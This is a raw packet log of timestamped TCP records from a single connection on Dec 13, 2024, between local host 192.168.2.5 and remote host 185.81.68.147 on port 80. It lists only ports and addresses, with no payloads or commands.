Dec 13, 2024 01:37:09.963124037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.963766098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.963876963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.963978052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.964632034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.004692078 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.108810902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.108892918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.109021902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.109071016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.109194040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.109241009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.109949112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.110080957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.110127926 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.110857010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.111598015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.111646891 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.112060070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.112076998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.112133980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.112673998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.112771988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.112823963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.113585949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.113703966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.113758087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.114491940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.114629030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.114681005 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.115415096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.115576982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.115626097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.116319895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.116487026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.116532087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.117228985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.117350101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.117453098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.120383024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.120795965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.120811939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.120829105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.120840073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.120845079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.120872974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.120950937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.120997906 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.121155024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.121171951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.121212959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.121938944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.122127056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.122179031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.123051882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.123068094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.123112917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.123754978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.123953104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.124002934 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.124736071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.124923944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.124970913 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.125664949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.125839949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.125884056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.126645088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.126662016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.126713991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.127638102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.127655983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.127705097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.128416061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.128433943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.128483057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.129393101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.129606962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.129677057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.130026102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.130072117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.130120993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.131396055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.131412029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.131463051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.131808043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.131877899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.131923914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.132677078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.132786989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.132838964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.133596897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.133743048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.133788109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.134499073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.134618998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.134665012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.135437012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.135552883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.135601997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.136322975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.136440039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.136488914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.137257099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.137382030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.137429953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.138477087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.140274048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.140403986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.141155005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.141170979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.141185999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.141201973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.141216993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.141233921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.141274929 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.141340971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.142075062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.142261028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.142308950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.142982960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.143183947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.143232107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.143908978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.144105911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.144150019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.144643068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.144850016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.144896984 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.145802021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.145817995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.145867109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.146591902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.146792889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.146840096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.147579908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.147597075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.147644997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.148538113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.148555040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.148602962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.149280071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.149471998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.149522066 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.150209904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.150412083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.150460005 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.151156902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.151365995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.151415110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.152101040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.152117968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.152163029 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.153033972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.153050900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.153095007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.153949022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.153965950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.154019117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.154673100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.154858112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.154907942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.155646086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.155827999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.155874968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.156542063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.207818985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.300956964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.301002026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.301152945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.301362991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.301496983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.301553965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.302254915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.302373886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.302418947 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.303211927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.303289890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.303342104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.304095984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.304183006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.304229975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.304980993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.305105925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.305152893 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.305885077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.306013107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.306061983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.306802988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.306909084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.306957960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.307739019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.307832956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.307878971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.308620930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.308825970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.308897018 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.309551954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.309704065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.309751987 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.310451031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.310580015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.310626030 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.311391115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.311460972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.311506987 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.312263966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.312385082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.312436104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.313169956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.313272953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.313318968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.314093113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.314217091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.314285994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.314997911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.315114975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.315164089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.315912008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.316051006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.316106081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.316832066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.316953897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.317001104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.317717075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.317941904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.317992926 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.318619967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.318775892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.318820000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.319576025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.319673061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.319720030 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.320468903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.320575953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.320633888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.321361065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.321495056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.321563959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.322264910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.322379112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.322422981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.323172092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.323323965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.323370934 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.324095011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.324203968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.324250937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.325000048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.325139999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.325185061 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.325907946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.326045990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.326153994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.326813936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.326936960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.327034950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.327722073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.327821016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.327918053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.328648090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.328739882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.328844070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.329552889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.329669952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.329766989 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.330466986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.330562115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.330652952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.331372976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.331501007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.331548929 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.332277060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.332393885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.332447052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.333199024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.333365917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.333412886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.334100962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.334203005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.334254980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.334995031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.335123062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.335227013 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.335906029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.336050034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.336148977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.336824894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.336944103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.337044001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.337742090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.337852955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.337896109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.338656902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.338768959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.338814974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.339555979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.339632988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.339677095 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.340473890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.340576887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.340617895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.341381073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.341514111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.341559887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.342302084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.342463970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.342509031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.343169928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.343303919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.343350887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.344090939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.344238997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.344285011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.345015049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.345206022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.345249891 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.345917940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.346020937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.346090078 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.346832991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.346985102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.347028017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.347750902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.347877979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.347925901 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.348607063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.395596981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.492888927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.492990017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.493089914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.493118048 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.493181944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.493227959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.493995905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.494148970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.494189978 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.494919062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.495049000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:10.495089054 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:10.495887041 CET	80	49707	185.81.68.147	192.168.2.5
